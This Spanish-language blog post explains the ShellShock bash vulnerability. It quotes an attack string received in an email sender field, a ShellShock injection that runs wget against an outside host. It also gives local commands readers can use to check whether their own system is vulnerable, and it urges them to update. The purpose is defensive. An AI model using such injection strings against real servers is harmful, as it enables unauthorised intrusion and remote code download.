Publicado por & archivado en Bash, Linux, Seguridad.

ShellShock es probablemente la vulnerabilidad más grave que afecta a sistemas *nix (Linux, BSD, MacOS y derivados). Un atacante podría hacerse con el control de un equipo sin intervención alguna del usuario.

Por ejemplo, hace unos días he recibido un mensaje con esto de remitente:

{ :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD

El comando explota la vulnerabilidad ShellShock, ejecutando el comando wget que descargaría el archivo de la página http://mlanissan.co.in/HELLOWORLD.

Esto es una prospección, si el comando se ejecuta, el que ha enviado eso tiene constancia, ya que esa página contiene sin duda un script que registra la IP desde la que se descargó el archivo. A partir de ahí, puede atacar el servidor para tratar de hacerse con el control.

Los usuarios de sistemas Linux o MacOS (basado en FreeBSD), pueden probar si su sistema operativo es vulnerable, en el caso de usuarios de Linux es más difícil por las constantes actualizaciones, pero los usuarios de Mac lo tienen peor, porque parece que Apple no tiene mucho interés en sacar parches.

Para hacer la prueba hay que abrir una consola y pegar esto:

env x='() { :;}; echo vulnerable' bash -c :

Si no devuelve nada, el sistema es seguro, si aparece la palabra “vulnerable” en la siguiente línea, hay que ejecutar este segundo comando para ver si tiene la versión más peligrosa de la vulnerabilidad, que permite la creación de archivos en el equipo atacado.

Si salió “vulnerable”, hay que probar con este segundo comando:

env X='() { (a)=>\' sh -c "echo date"; cat echo

Si falla sale esto:

cat: echo: No such file or directory

Si crea el archivo, aparecerá esto:

sh: X: line 1: syntax error near unexpected token `='
sh: X: line 1: `'
sh: error importing function definition for `X'
vie jul 3 13:06:47 CEST 2015

Y en el mismo directorio se habrá creado un archivo de nombre “echo” con la fecha y hora dentro.

Si este último es tu caso, la seguridad de tu equipo está gravemente comprometida y deberías proceder a una actualización del sistema operativo.

Deja un comentario

Tu dirección de correo electrónico no será publicada.